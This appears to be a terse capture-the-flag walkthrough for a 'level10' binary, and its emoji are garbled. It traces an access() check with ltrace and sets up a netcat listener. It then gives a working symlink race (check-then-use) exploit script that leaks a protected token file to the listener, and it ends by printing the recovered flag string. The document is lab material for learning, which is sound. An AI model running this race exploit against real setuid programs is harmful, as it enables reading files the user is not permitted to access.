ðŸ”» Analyze
â¬‡ï¸ ./level10 token http://localhost
â¬‡ï¸ ltrace ./level10 token http://localhost
ðŸ‘‰ access("token", 4)
â¬‡ï¸ man 2 access
ðŸ‘‰ NOTES ðŸŒŸ Warning:  Using  access() ...


ðŸ”» Networking
ðŸŒŸ https://ru.wikipedia.org/wiki/Netcat
â¬‡ï¸ nc -lk 6969 > /tmp/output &

â¬‡ï¸ curl http://localhost:6969
â¬‡ï¸ ctrl+c
ðŸ‘‰ cat /tmp/output

â¬‡ï¸ echo token_test > /tmp/foo
â¬‡ï¸ ./level10 /tmp/foo 127.0.0.1
ðŸ‘‰ cat /tmp/output
â¹ kill %1


ðŸ”» Before hack

echo token_test > /tmp/foo
ln -sf /tmp/foo /tmp/sym
ls -la /tmp/sym

ln -sf /home/user/level10/token /tmp/sym
ls -la /tmp/sym

python_one_line src: https://stackoverflow.com/a/35651859
python -c $'import os\nimport time\nwhile True:\n\tprint("ok")\n\ttime.sleep(1)\n'


ðŸ”» Hack
rm /tmp/output; nc -lk 6969 > /tmp/output &
echo token_test > /tmp/foo
python -c $'import os\nwhile True:\n\tos.system("ln -sf {} {}".format("/tmp/foo", "/tmp/sym"))\n\tos.system("ln -sf {} {}".format("/home/user/level10/token", "/tmp/sym"))' &
python -c $'import os\nfor _ in range(100):\n\tos.system("./level10 /tmp/sym 127.0.0.1")'

cat /tmp/output

kill %1
kill %2

woupa2yuojeeaaed06riuj63c
